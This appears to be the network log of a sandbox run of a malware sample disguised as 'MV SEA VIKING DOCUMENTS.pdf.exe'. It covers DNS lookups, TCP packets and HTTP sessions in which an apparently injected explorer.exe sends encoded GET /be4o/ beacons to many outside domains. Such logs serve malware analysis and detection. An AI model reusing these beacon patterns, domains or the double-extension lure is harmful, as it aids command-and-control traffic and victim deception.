                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.628979921 CET804987034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.629241943 CET4987080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.629331112 CET4987080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.639678955 CET804987034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.798185110 CET804987034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.798249960 CET804987034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.798680067 CET4987080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.798742056 CET4987080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.808984041 CET804987034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:46.805346966 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:46.971765995 CET804987145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:46.971988916 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:46.972162008 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.138446093 CET804987145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.475931883 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.555888891 CET804987145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.555937052 CET804987145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.556097031 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.556147099 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.642950058 CET804987145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.643349886 CET4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.490638971 CET4987280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.498826027 CET804987234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.499041080 CET4987280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.499147892 CET4987280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.507361889 CET804987234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.668587923 CET804987234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.668638945 CET804987234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.669055939 CET4987280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.669107914 CET4987280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.679153919 CET804987234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.693661928 CET4987580192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.716332912 CET804987535.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.716553926 CET4987580192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.716633081 CET4987580192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.739124060 CET804987535.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.739197969 CET804987535.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.739234924 CET804987535.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.739554882 CET4987580192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.739605904 CET4987580192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.761929989 CET804987535.214.4.70192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                              Feb 21, 2022 16:54:11.395864964 CET6059153192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:54:11.432866096 CET53605911.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:38.312161922 CET5932853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:54:38.343334913 CET53593281.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:48.450026035 CET6028653192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:54:48.473849058 CET53602861.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:57.010827065 CET6370953192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:54:57.022368908 CET53637091.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.026734114 CET5750953192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.087418079 CET5750953192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.260544062 CET53575099.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.327531099 CET53575091.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:07.383620977 CET6064853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:55:07.445580006 CET6064853192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:55:07.489294052 CET53606489.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:07.576991081 CET53606481.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.491822958 CET6214653192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.553824902 CET6214653192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.981295109 CET53621469.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.985958099 CET53621461.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.940363884 CET6432853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.984378099 CET53643281.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.126812935 CET5494053192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.172348022 CET53549401.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:43.234884977 CET6202253192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:55:43.265649080 CET53620221.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.275760889 CET5076253192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.337985992 CET5076253192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.341202974 CET53507629.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.341559887 CET53507621.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:20.430728912 CET5659053192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:20.444781065 CET53565901.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.613698959 CET4931753192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET53493171.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:43.980432987 CET5143553192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:44.060471058 CET5143553192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:56:45.080615997 CET5143553192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.094183922 CET5143553192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.094238997 CET5143553192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.517788887 CET53514351.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.517807961 CET53514351.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.518302917 CET5143553192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.518939972 CET53514351.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:48.345483065 CET53514359.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:48.347796917 CET53514359.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:48.347865105 CET53514359.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:52.525007010 CET5654253192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:52.535520077 CET53565421.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.550146103 CET6246353192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.567264080 CET53624631.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:14.859069109 CET5062353192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:57:14.920610905 CET5062353192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:57:15.935929060 CET5062353192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:57:17.951534033 CET5062353192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:57:17.951581955 CET5062353192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781239033 CET53506231.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781336069 CET53506231.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781379938 CET53506231.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781862020 CET5062353192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.794153929 CET5422853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.830279112 CET53542281.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:30.901686907 CET6344753192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:57:30.963957071 CET6344753192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:57:30.989701033 CET53634471.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:31.304647923 CET53634479.9.9.9192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:57:57.677630901 CET5281653192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:57:57.687225103 CET53528161.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:07.753551006 CET5313853192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:58:07.765171051 CET53531381.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.641823053 CET5799153192.168.11.201.1.1.1
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.704071045 CET5799153192.168.11.209.9.9.9
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.823009968 CET53579911.1.1.1192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.919392109 CET53579919.9.9.9192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                                                                                                                                                                              Feb 21, 2022 16:55:07.445580006 CET192.168.11.209.9.9.90xbd8bStandard query (0)www.percentrostered.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.491822958 CET192.168.11.201.1.1.10x9533Standard query (0)www.nagradi7.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:12.553824902 CET192.168.11.209.9.9.90x9533Standard query (0)www.nagradi7.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.940363884 CET192.168.11.201.1.1.10x11aaStandard query (0)www.eaglesaviationexperience.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.126812935 CET192.168.11.201.1.1.10x45a2Standard query (0)www.easypeasy.communityA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:55:43.234884977 CET192.168.11.201.1.1.10x80b3Standard query (0)www.piqqekqqbpjpajbzvvfqapwr.storeA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.275760889 CET192.168.11.201.1.1.10x56f9Standard query (0)www.icarus-groupe.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.337985992 CET192.168.11.209.9.9.90x56f9Standard query (0)www.icarus-groupe.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:20.430728912 CET192.168.11.201.1.1.10x59fStandard query (0)www.istemnetwork.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.613698959 CET192.168.11.201.1.1.10xd150Standard query (0)www.brainymortgage.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:43.980432987 CET192.168.11.201.1.1.10x2bfbStandard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:44.060471058 CET192.168.11.209.9.9.90x2bfbStandard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:45.080615997 CET192.168.11.201.1.1.10x2bfbStandard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.094183922 CET192.168.11.201.1.1.10x2bfbStandard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.094238997 CET192.168.11.209.9.9.90x2bfbStandard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.518302917 CET192.168.11.209.9.9.90x2bfbStandard query (0)www.kuanghong.clubA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:52.525007010 CET192.168.11.201.1.1.10xcf5eStandard query (0)www.justbe-event.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.550146103 CET192.168.11.201.1.1.10x2f93Standard query (0)www.janhenningsen.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:14.859069109 CET192.168.11.201.1.1.10x3c87Standard query (0)www.logotzo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:14.920610905 CET192.168.11.209.9.9.90x3c87Standard query (0)www.logotzo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:15.935929060 CET192.168.11.201.1.1.10x3c87Standard query (0)www.logotzo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:17.951534033 CET192.168.11.201.1.1.10x3c87Standard query (0)www.logotzo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:17.951581955 CET192.168.11.209.9.9.90x3c87Standard query (0)www.logotzo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781862020 CET192.168.11.209.9.9.90x3c87Standard query (0)www.logotzo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.794153929 CET192.168.11.201.1.1.10x1bf6Standard query (0)www.kaikkistore.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:30.901686907 CET192.168.11.201.1.1.10x9fe5Standard query (0)www.piqqekqqbpjpajbzvvfqapwr.storeA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:30.963957071 CET192.168.11.209.9.9.90x9fe5Standard query (0)www.piqqekqqbpjpajbzvvfqapwr.storeA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:57.677630901 CET192.168.11.201.1.1.10x1529Standard query (0)www.icarus-groupe.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:07.753551006 CET192.168.11.201.1.1.10xb7d6Standard query (0)www.istemnetwork.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.641823053 CET192.168.11.201.1.1.10x2c0eStandard query (0)www.vaughnediting.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.704071045 CET192.168.11.209.9.9.90x2c0eStandard query (0)www.vaughnediting.comA (IP address)IN (0x0001)
Timestamp, Source IP, Dest IP, Trans ID, Reply Code, Name, CName, Address, Type, Class
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.341202974 CET9.9.9.9192.168.11.200x56f9Name error (3)www.icarus-groupe.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:10.341559887 CET1.1.1.1192.168.11.200x56f9Name error (3)www.icarus-groupe.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:20.444781065 CET1.1.1.1192.168.11.200x59fName error (3)www.istemnetwork.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)www.brainymortgage.infoparking.namesilo.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com64.32.22.102A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com168.235.88.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com107.161.23.204A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com192.161.187.200A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com204.188.203.155A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com45.58.190.82A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com198.251.84.92A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com209.141.38.71A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com198.251.81.30A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.648030996 CET1.1.1.1192.168.11.200xd150No error (0)parking.namesilo.com70.39.125.244A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.517788887 CET1.1.1.1192.168.11.200x2bfbServer failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.517807961 CET1.1.1.1192.168.11.200x2bfbServer failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:47.518939972 CET1.1.1.1192.168.11.200x2bfbServer failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:48.345483065 CET9.9.9.9192.168.11.200x2bfbServer failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:48.347796917 CET9.9.9.9192.168.11.200x2bfbServer failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:48.347865105 CET9.9.9.9192.168.11.200x2bfbServer failure (2)www.kuanghong.clubnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:52.535520077 CET1.1.1.1192.168.11.200xcf5eName error (3)www.justbe-event.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.567264080 CET1.1.1.1192.168.11.200x2f93No error (0)www.janhenningsen.com217.160.0.98A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781239033 CET1.1.1.1192.168.11.200x3c87Server failure (2)www.logotzo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781336069 CET1.1.1.1192.168.11.200x3c87Server failure (2)www.logotzo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:20.781379938 CET1.1.1.1192.168.11.200x3c87Server failure (2)www.logotzo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.830279112 CET1.1.1.1192.168.11.200x1bf6No error (0)www.kaikkistore.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.830279112 CET1.1.1.1192.168.11.200x1bf6No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:30.989701033 CET1.1.1.1192.168.11.200x9fe5Name error (3)www.piqqekqqbpjpajbzvvfqapwr.storenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:31.304647923 CET9.9.9.9192.168.11.200x9fe5Name error (3)www.piqqekqqbpjpajbzvvfqapwr.storenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:57:57.687225103 CET1.1.1.1192.168.11.200x1529Name error (3)www.icarus-groupe.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:07.765171051 CET1.1.1.1192.168.11.200xb7d6Name error (3)www.istemnetwork.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.823009968 CET1.1.1.1192.168.11.200x2c0eNo error (0)www.vaughnediting.comvaughnediting.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.823009968 CET1.1.1.1192.168.11.200x2c0eNo error (0)vaughnediting.com192.0.78.25A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.823009968 CET1.1.1.1192.168.11.200x2c0eNo error (0)vaughnediting.com192.0.78.24A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.919392109 CET9.9.9.9192.168.11.200x2c0eNo error (0)www.vaughnediting.comvaughnediting.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.919392109 CET9.9.9.9192.168.11.200x2c0eNo error (0)vaughnediting.com192.0.78.25A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Feb 21, 2022 16:58:15.919392109 CET9.9.9.9192.168.11.200x2c0eNo error (0)vaughnediting.com192.0.78.24A (IP address)IN (0x0001)
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49756 | 142.250.185.174 | 443 | C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.11.20 | 49757 | 142.250.185.161 | 443 | C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.11.20 | 49788 | 185.190.39.52 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:52:17.122103930 CET | 8985 | OUT | GET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1
Host: www.dreamintelligent.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:52:18.492628098 CET | 8985 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
X-Powered-By: PHP/7.2.34
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: https://www.dreamintelligent.com/be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0
Content-Length: 0
Date: Mon, 21 Feb 2022 15:52:18 GMT
Server: LiteSpeed
Vary: User-Agent


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.11.20 | 49790 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:52:22.827588081 CET | 8993 | OUT | GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1
Host: www.josiemaran-supernatural.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:52:22.997085094 CET | 8993 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 21 Feb 2022 15:52:22 GMT
Content-Type: text/html
Content-Length: 275
ETag: "620175f5-113"
Via: 1.1 google
Connection: close
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.11.20 | 49791 | 45.195.115.71 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:52:28.620803118 CET | 8994 | OUT | GET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.rsxrsh.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:52:29.171334982 CET | 8995 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                              Server: nginx/1.20.1
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:52:29 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=gbk
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/5.6.40
                                                                                                                                                                                                                              Location: /404.html
                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.11.20 | 49792 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:52:34.180299044 CET | 8996 | OUT | GET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.noireimpactcollective.net
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:52:34.286969900 CET | 8996 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:52:34 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "61ffb800-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
